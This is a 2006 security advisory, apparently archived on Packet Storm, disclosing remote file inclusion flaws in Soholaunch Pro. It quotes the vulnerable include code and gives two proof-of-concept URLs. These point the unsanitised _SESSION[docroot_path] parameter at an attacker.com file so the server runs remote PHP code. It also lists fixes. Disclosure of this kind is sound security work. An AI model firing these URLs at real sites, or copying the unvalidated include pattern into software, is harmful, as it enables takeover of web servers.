what you don't know can hurt you

Echo Security Advisory 2006.57

Echo Security Advisory 2006.57
Posted Nov 7, 2006
Authored by Echo Security, the_day | Site advisories.echo.or.id

Soholaunch Pro versions 4.9 r36 and below suffer from remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, file inclusion
MD5 | bd7920df47fa125843a510e68950126e

Echo Security Advisory 2006.57

Change Mirror Download
____________________   ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_57$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_57$2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : October, 31th 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv57-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Soholaunch Pro Edition
version : <=4.9 r46
URL : http://www.soholaunch.com

Soholaunch Pro Edition is a software product that makes it easy for people of all experience levels to create
and maintain a great website. It reins-in the hard parts of building a website and presents them a way that the
non-geek can understand and control
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

I found vulnerability in script shared_functions.php
--------------------------shared_functions.php-----------------------------------
....
<?
...
include_once($_SESSION['docroot_path']."/sohoadmin/includes/mysql_insert.class.php");

# userData manipulation class (works with misc_userdata table)

include_once($_SESSION['docroot_path']."/sohoadmin/includes/userdata.class.php");

...
----------------------------------------------------------

Input passed to the "$_SESSION['docroot_path']" parameter in shared_functions.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files :

/client_files/shopping_cart/pgm-shopping_css.inc.php
/program/includes/shared_functions.php



Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?
http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?


Solution:
~~~~~~

- Sanitize variable $_SESSION['docroot_path'] affected files.
- Turn off register_globals

Timeline :
~~~~~~~~

31 - 10 - 2006 bugs found
31 - 10 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close